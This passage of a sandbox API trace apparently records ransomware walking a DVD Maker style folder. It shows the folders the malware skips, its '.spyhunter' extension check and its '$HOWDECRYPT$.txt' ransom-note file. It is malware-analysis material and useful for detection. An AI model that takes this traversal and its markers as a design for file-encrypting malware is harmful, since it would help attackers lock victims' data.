RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1610) returned 0x2c310e0 [0092.246] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.246] lstrcmpiW (lpString1="BabyBoyMainToNotesBackground.wmv", lpString2="Windows") returned -1 [0092.246] lstrlenW (lpString="Windows") returned 7 [0092.246] lstrcmpiW (lpString1="BabyBoyMainToNotesBackground.wmv", lpString2="$Recycle.bin") returned 1 [0092.246] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.246] lstrcmpiW (lpString1="BabyBoyMainToNotesBackground.wmv", lpString2="System Volume Information") returned -1 [0092.246] lstrlenW (lpString="System Volume Information") returned 25 [0092.246] wnsprintfW (in: pszDest=0x2c13898, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainToNotesBackground.wmv") returned 88 [0092.246] StrStrIW (lpFirst="BabyBoyMainToNotesBackground.wmv", lpSrch=".spyhunter") returned 0x0 [0092.246] lstrcmpW (lpString1="BabyBoyMainToNotesBackground.wmv", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.246] lstrcmpW (lpString1="BabyBoyMainToNotesBackground.wmv", lpString2="_uninstalling_.png") returned 1 [0092.246] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainToNotesBackground.wmv") returned 88 [0092.247] GetProcessHeap () returned 0x2c0000 [0092.247] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xf2) returned 0x35a260 [0092.247] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1618) returned 0x2c310e0 [0092.247] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.247] lstrcmpiW (lpString1="BabyBoyMainToNotesBackground_PAL.wmv", lpString2="Windows") returned -1 [0092.247] lstrlenW (lpString="Windows") returned 7 [0092.247] lstrcmpiW (lpString1="BabyBoyMainToNotesBackground_PAL.wmv", lpString2="$Recycle.bin") returned 1 [0092.247] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.247] lstrcmpiW (lpString1="BabyBoyMainToNotesBackground_PAL.wmv", lpString2="System Volume Information") returned -1 [0092.247] lstrlenW (lpString="System Volume Information") returned 25 [0092.247] wnsprintfW (in: pszDest=0x2c13898, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainToNotesBackground_PAL.wmv") returned 92 [0092.247] StrStrIW (lpFirst="BabyBoyMainToNotesBackground_PAL.wmv", lpSrch=".spyhunter") returned 0x0 [0092.247] lstrcmpW (lpString1="BabyBoyMainToNotesBackground_PAL.wmv", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.247] lstrcmpW (lpString1="BabyBoyMainToNotesBackground_PAL.wmv", lpString2="_uninstalling_.png") returned 1 [0092.247] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainToNotesBackground_PAL.wmv") returned 92 [0092.247] GetProcessHeap () returned 0x2c0000 [0092.247] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xfa) returned 0x381880 [0092.247] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1620) returned 0x2c310e0 [0092.247] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.247] lstrcmpiW (lpString1="BabyBoyMainToScenesBackground.wmv", lpString2="Windows") returned -1 [0092.247] lstrlenW (lpString="Windows") returned 7 [0092.247] lstrcmpiW (lpString1="BabyBoyMainToScenesBackground.wmv", lpString2="$Recycle.bin") returned 1 [0092.247] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.248] lstrcmpiW (lpString1="BabyBoyMainToScenesBackground.wmv", lpString2="System Volume Information") returned -1 [0092.248] lstrlenW (lpString="System Volume Information") returned 25 [0092.248] wnsprintfW (in: pszDest=0x2c13898, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainToScenesBackground.wmv") returned 89 [0092.248] StrStrIW (lpFirst="BabyBoyMainToScenesBackground.wmv", lpSrch=".spyhunter") returned 0x0 [0092.248] lstrcmpW (lpString1="BabyBoyMainToScenesBackground.wmv", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.248] lstrcmpW (lpString1="BabyBoyMainToScenesBackground.wmv", lpString2="_uninstalling_.png") returned 1 [0092.248] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainToScenesBackground.wmv") returned 89 [0092.248] GetProcessHeap () returned 0x2c0000 [0092.248] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xf4) returned 0x35a360 [0092.248] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1628) returned 0x2c310e0 [0092.248] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.248] lstrcmpiW (lpString1="BabyBoyMainToScenesBackground_PAL.wmv", lpString2="Windows") returned -1 [0092.248] lstrlenW (lpString="Windows") returned 7 [0092.248] lstrcmpiW (lpString1="BabyBoyMainToScenesBackground_PAL.wmv", lpString2="$Recycle.bin") returned 1 [0092.265] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.266] lstrcmpiW (lpString1="BabyBoyMainToScenesBackground_PAL.wmv", lpString2="System Volume Information") returned -1 [0092.266] lstrlenW (lpString="System Volume Information") returned 25 [0092.266] wnsprintfW (in: pszDest=0x2c13898, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainToScenesBackground_PAL.wmv") returned 93 [0092.266] StrStrIW (lpFirst="BabyBoyMainToScenesBackground_PAL.wmv", lpSrch=".spyhunter") returned 0x0 [0092.266] lstrcmpW (lpString1="BabyBoyMainToScenesBackground_PAL.wmv", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.266] lstrcmpW (lpString1="BabyBoyMainToScenesBackground_PAL.wmv", lpString2="_uninstalling_.png") returned 1 [0092.266] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainToScenesBackground_PAL.wmv") returned 93 [0092.266] GetProcessHeap () returned 0x2c0000 [0092.266] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xfc) returned 0x381880 [0092.266] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x15b8) returned 0x2c310e0 [0092.266] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.266] lstrcmpiW (lpString1="BabyBoyNotesBackground.wmv", lpString2="Windows") returned -1 [0092.266] lstrlenW (lpString="Windows") returned 7 [0092.266] lstrcmpiW (lpString1="BabyBoyNotesBackground.wmv", lpString2="$Recycle.bin") returned 1 [0092.266] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.266] lstrcmpiW (lpString1="BabyBoyNotesBackground.wmv", lpString2="System Volume Information") returned -1 [0092.266] lstrlenW (lpString="System Volume Information") returned 25 [0092.266] wnsprintfW (in: pszDest=0x2c13898, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyNotesBackground.wmv") returned 82 [0092.266] StrStrIW (lpFirst="BabyBoyNotesBackground.wmv", lpSrch=".spyhunter") returned 0x0 [0092.266] lstrcmpW (lpString1="BabyBoyNotesBackground.wmv", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.266] lstrcmpW (lpString1="BabyBoyNotesBackground.wmv", lpString2="_uninstalling_.png") returned 1 [0092.266] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyNotesBackground.wmv") returned 82 [0092.267] GetProcessHeap () returned 0x2c0000 [0092.267] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe6) returned 0x34f508 [0092.267] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x15c0) returned 0x2c310e0 [0092.267] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.267] lstrcmpiW (lpString1="BabyBoyNotesBackground_PAL.wmv", lpString2="Windows") returned -1 [0092.267] lstrlenW (lpString="Windows") returned 7 [0092.267] lstrcmpiW (lpString1="BabyBoyNotesBackground_PAL.wmv", lpString2="$Recycle.bin") returned 1 [0092.267] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.267] lstrcmpiW (lpString1="BabyBoyNotesBackground_PAL.wmv", lpString2="System Volume Information") returned -1 [0092.267] lstrlenW (lpString="System Volume Information") returned 25 [0092.267] wnsprintfW (in: pszDest=0x2c13898, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyNotesBackground_PAL.wmv") returned 86 [0092.267] StrStrIW (lpFirst="BabyBoyNotesBackground_PAL.wmv", lpSrch=".spyhunter") returned 0x0 [0092.267] lstrcmpW (lpString1="BabyBoyNotesBackground_PAL.wmv", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.267] lstrcmpW (lpString1="BabyBoyNotesBackground_PAL.wmv", lpString2="_uninstalling_.png") returned 1 [0092.267] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyNotesBackground_PAL.wmv") returned 86 [0092.267] GetProcessHeap () returned 0x2c0000 [0092.267] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xee) returned 0x3555a0 [0092.267] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x15c8) returned 0x2c310e0 [0092.267] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.267] lstrcmpiW (lpString1="BabyBoyScenesBackground.wmv", lpString2="Windows") returned -1 [0092.267] lstrlenW (lpString="Windows") returned 7 [0092.267] lstrcmpiW (lpString1="BabyBoyScenesBackground.wmv", lpString2="$Recycle.bin") returned 1 [0092.267] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.267] lstrcmpiW (lpString1="BabyBoyScenesBackground.wmv", lpString2="System Volume Information") returned -1 [0092.268] lstrlenW (lpString="System Volume Information") returned 25 [0092.268] wnsprintfW (in: pszDest=0x2c13898, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyScenesBackground.wmv") returned 83 [0092.268] StrStrIW (lpFirst="BabyBoyScenesBackground.wmv", lpSrch=".spyhunter") returned 0x0 [0092.268] lstrcmpW (lpString1="BabyBoyScenesBackground.wmv", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.268] lstrcmpW (lpString1="BabyBoyScenesBackground.wmv", lpString2="_uninstalling_.png") returned 1 [0092.268] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyScenesBackground.wmv") returned 83 [0092.268] GetProcessHeap () returned 0x2c0000 [0092.268] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe8) returned 0x34f328 [0092.268] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x15d0) returned 0x2c310e0 [0092.268] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.268] lstrcmpiW (lpString1="BabyBoyScenesBackground_PAL.wmv", lpString2="Windows") returned -1 [0092.268] lstrlenW (lpString="Windows") returned 7 [0092.268] lstrcmpiW (lpString1="BabyBoyScenesBackground_PAL.wmv", lpString2="$Recycle.bin") returned 1 [0092.268] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.268] lstrcmpiW (lpString1="BabyBoyScenesBackground_PAL.wmv", lpString2="System Volume Information") returned -1 [0092.268] lstrlenW (lpString="System Volume Information") returned 25 [0092.268] wnsprintfW (in: pszDest=0x2c13898, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyScenesBackground_PAL.wmv") returned 87 [0092.268] StrStrIW (lpFirst="BabyBoyScenesBackground_PAL.wmv", lpSrch=".spyhunter") returned 0x0 [0092.268] lstrcmpW (lpString1="BabyBoyScenesBackground_PAL.wmv", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.268] lstrcmpW (lpString1="BabyBoyScenesBackground_PAL.wmv", lpString2="_uninstalling_.png") returned 1 [0092.268] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyScenesBackground_PAL.wmv") returned 87 [0092.268] GetProcessHeap () returned 0x2c0000 [0092.268] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xf0) returned 0x355698 [0092.269] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x15d8) returned 0x2c310e0 [0092.269] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.269] lstrcmpiW (lpString1="LightBlueRectangle.PNG", lpString2="Windows") returned -1 [0092.269] lstrlenW (lpString="Windows") returned 7 [0092.269] lstrcmpiW (lpString1="LightBlueRectangle.PNG", lpString2="$Recycle.bin") returned 1 [0092.269] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.269] lstrcmpiW (lpString1="LightBlueRectangle.PNG", lpString2="System Volume Information") returned -1 [0092.269] lstrlenW (lpString="System Volume Information") returned 25 [0092.269] wnsprintfW (in: pszDest=0x2c13898, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\LightBlueRectangle.PNG") returned 78 [0092.269] StrStrIW (lpFirst="LightBlueRectangle.PNG", lpSrch=".spyhunter") returned 0x0 [0092.269] lstrcmpW (lpString1="LightBlueRectangle.PNG", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.269] lstrcmpW (lpString1="LightBlueRectangle.PNG", lpString2="_uninstalling_.png") returned 1 [0092.270] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\LightBlueRectangle.PNG") returned 78 [0092.270] GetProcessHeap () returned 0x2c0000 [0092.270] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xde) returned 0x3780d8 [0092.270] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x15e0) returned 0x2c310e0 [0092.270] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.270] lstrcmpiW (lpString1="MainMenuButtonIcon.png", lpString2="Windows") returned -1 [0092.270] lstrlenW (lpString="Windows") returned 7 [0092.270] lstrcmpiW (lpString1="MainMenuButtonIcon.png", lpString2="$Recycle.bin") returned 1 [0092.270] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.270] lstrcmpiW (lpString1="MainMenuButtonIcon.png", lpString2="System Volume Information") returned -1 [0092.270] lstrlenW (lpString="System Volume Information") returned 25 [0092.270] wnsprintfW (in: pszDest=0x2c13898, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\MainMenuButtonIcon.png") returned 78 [0092.270] StrStrIW (lpFirst="MainMenuButtonIcon.png", lpSrch=".spyhunter") returned 0x0 [0092.270] lstrcmpW (lpString1="MainMenuButtonIcon.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.270] lstrcmpW (lpString1="MainMenuButtonIcon.png", lpString2="_uninstalling_.png") returned 1 [0092.270] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\MainMenuButtonIcon.png") returned 78 [0092.270] GetProcessHeap () returned 0x2c0000 [0092.270] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xde) returned 0x3781c0 [0092.270] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x15e8) returned 0x2c310e0 [0092.270] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.270] lstrcmpiW (lpString1="navSubpicture.png", lpString2="Windows") returned -1 [0092.270] lstrlenW (lpString="Windows") returned 7 [0092.270] lstrcmpiW (lpString1="navSubpicture.png", lpString2="$Recycle.bin") returned 1 [0092.270] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.271] lstrcmpiW (lpString1="navSubpicture.png", lpString2="System Volume Information") returned -1 [0092.271] lstrlenW (lpString="System Volume Information") returned 25 [0092.271] wnsprintfW (in: pszDest=0x2c13898, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\navSubpicture.png") returned 73 [0092.271] StrStrIW (lpFirst="navSubpicture.png", lpSrch=".spyhunter") returned 0x0 [0092.271] lstrcmpW (lpString1="navSubpicture.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.271] lstrcmpW (lpString1="navSubpicture.png", lpString2="_uninstalling_.png") returned 1 [0092.271] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\navSubpicture.png") returned 73 [0092.271] GetProcessHeap () returned 0x2c0000 [0092.271] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd4) returned 0x346728 [0092.271] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x15f0) returned 0x2c310e0 [0092.271] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.271] lstrcmpiW (lpString1="nav_leftarrow.png", lpString2="Windows") returned -1 [0092.271] lstrlenW (lpString="Windows") returned 7 [0092.271] lstrcmpiW (lpString1="nav_leftarrow.png", lpString2="$Recycle.bin") returned 1 [0092.271] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.271] lstrcmpiW (lpString1="nav_leftarrow.png", lpString2="System Volume Information") returned -1 [0092.271] lstrlenW (lpString="System Volume Information") returned 25 [0092.271] wnsprintfW (in: pszDest=0x2c13898, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\nav_leftarrow.png") returned 73 [0092.271] StrStrIW (lpFirst="nav_leftarrow.png", lpSrch=".spyhunter") returned 0x0 [0092.271] lstrcmpW (lpString1="nav_leftarrow.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.272] lstrcmpW (lpString1="nav_leftarrow.png", lpString2="_uninstalling_.png") returned 1 [0092.272] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\nav_leftarrow.png") returned 73 [0092.272] GetProcessHeap () returned 0x2c0000 [0092.272] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd4) returned 0x346d48 [0092.272] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x15f8) returned 0x2c310e0 [0092.272] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.272] lstrcmpiW (lpString1="nav_rightarrow.png", lpString2="Windows") returned -1 [0092.272] lstrlenW (lpString="Windows") returned 7 [0092.272] lstrcmpiW (lpString1="nav_rightarrow.png", lpString2="$Recycle.bin") returned 1 [0092.272] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.272] lstrcmpiW (lpString1="nav_rightarrow.png", lpString2="System Volume Information") returned -1 [0092.272] lstrlenW (lpString="System Volume Information") returned 25 [0092.272] wnsprintfW (in: pszDest=0x2c13898, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\nav_rightarrow.png") returned 74 [0092.284] StrStrIW (lpFirst="nav_rightarrow.png", lpSrch=".spyhunter") returned 0x0 [0092.284] lstrcmpW (lpString1="nav_rightarrow.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.284] lstrcmpW (lpString1="nav_rightarrow.png", lpString2="_uninstalling_.png") returned 1 [0092.284] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\nav_rightarrow.png") returned 74 [0092.284] GetProcessHeap () returned 0x2c0000 [0092.284] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd6) returned 0x346648 [0092.284] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1600) returned 0x2c310e0 [0092.284] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.284] lstrcmpiW (lpString1="nav_uparrow.png", lpString2="Windows") returned -1 [0092.284] lstrlenW (lpString="Windows") returned 7 [0092.284] lstrcmpiW (lpString1="nav_uparrow.png", lpString2="$Recycle.bin") returned 1 [0092.284] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.285] lstrcmpiW (lpString1="nav_uparrow.png", lpString2="System Volume Information") returned -1 [0092.285] lstrlenW (lpString="System Volume Information") returned 25 [0092.285] wnsprintfW (in: pszDest=0x2c13898, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\nav_uparrow.png") returned 71 [0092.285] StrStrIW (lpFirst="nav_uparrow.png", lpSrch=".spyhunter") returned 0x0 [0092.289] lstrcmpW (lpString1="nav_uparrow.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.289] lstrcmpW (lpString1="nav_uparrow.png", lpString2="_uninstalling_.png") returned 1 [0092.289] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\nav_uparrow.png") returned 71 [0092.289] GetProcessHeap () returned 0x2c0000 [0092.289] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd0) returned 0x37e560 [0092.289] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1608) returned 0x2c310e0 [0092.289] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0 [0092.289] FindClose (in: hFindFile=0x335fa0 | out: hFindFile=0x335fa0) returned 1 [0092.290] wnsprintfW (in: pszDest=0x2c13898, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\$HOWDECRYPT$.txt") returned 72 [0092.290] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\$HOWDECRYPT$.txt") returned 72 [0092.290] GetProcessHeap () returned 0x2c0000 [0092.290] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd2) returned 0x346808 [0092.291] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1610) returned 0x2c310e0 [0092.291] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0092.291] lstrcmpiW (lpString1="BabyGirl", lpString2="Windows") returned -1 [0092.291] lstrlenW (lpString="Windows") returned 7 [0092.291] lstrcmpiW (lpString1="BabyGirl", lpString2="$Recycle.bin") returned 1 [0092.291] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.291] lstrcmpiW (lpString1="BabyGirl", lpString2="System Volume Information") returned -1 [0092.291] lstrlenW (lpString="System Volume Information") returned 25 [0092.291] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl") returned 56 [0092.291] lstrcmpW (lpString1="BabyGirl", lpString2=".") returned 1 [0092.291] lstrcmpW (lpString1="BabyGirl", lpString2="..") returned 1 [0092.291] GetProcessHeap () returned 0x2c0000 [0092.291] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c13898 [0092.291] wnsprintfW (in: pszDest=0x2c13898, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\*") returned 58 [0092.291] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\*", lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0x335fa0 [0092.416] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0092.416] lstrlenW (lpString="Windows") returned 7 [0092.416] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0092.416] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.416] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0092.416] lstrlenW (lpString="System Volume Information") returned 25 [0092.416] wnsprintfW (in: pszDest=0x2c13898, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\.") returned 58 [0092.416] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0092.416] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.416] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0092.416] lstrlenW (lpString="Windows") returned 7 [0092.416] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0092.416] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.417] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0092.417] lstrlenW (lpString="System Volume Information") returned 25 [0092.417] wnsprintfW (in: pszDest=0x2c13898, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\..") returned 59 [0092.417] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0092.417] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0092.417] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.417] lstrcmpiW (lpString1="16_9-frame-background.png", lpString2="Windows") returned -1 [0092.417] lstrlenW (lpString="Windows") returned 7 [0092.417] lstrcmpiW (lpString1="16_9-frame-background.png", lpString2="$Recycle.bin") returned 1 [0092.417] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.417] lstrcmpiW (lpString1="16_9-frame-background.png", lpString2="System Volume Information") returned -1 [0092.417] lstrlenW (lpString="System Volume Information") returned 25 [0092.417] wnsprintfW (in: pszDest=0x2c13898, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\16_9-frame-background.png") returned 82 [0092.417] StrStrIW (lpFirst="16_9-frame-background.png", lpSrch=".spyhunter") returned 0x0 [0092.417] lstrcmpW (lpString1="16_9-frame-background.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.417] lstrcmpW (lpString1="16_9-frame-background.png", lpString2="_uninstalling_.png") returned 1 [0092.417] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\16_9-frame-background.png") returned 82 [0092.417] GetProcessHeap () returned 0x2c0000 [0092.417] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe6) returned 0x34f508 [0092.417] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1540) returned 0x2c310e0 [0092.417] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.417] lstrcmpiW (lpString1="16_9-frame-highlight.png", lpString2="Windows") returned -1 [0092.417] lstrlenW (lpString="Windows") returned 7 [0092.417] lstrcmpiW (lpString1="16_9-frame-highlight.png", lpString2="$Recycle.bin") returned 1 [0092.418] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.418] lstrcmpiW (lpString1="16_9-frame-highlight.png", lpString2="System Volume Information") returned -1 [0092.418] 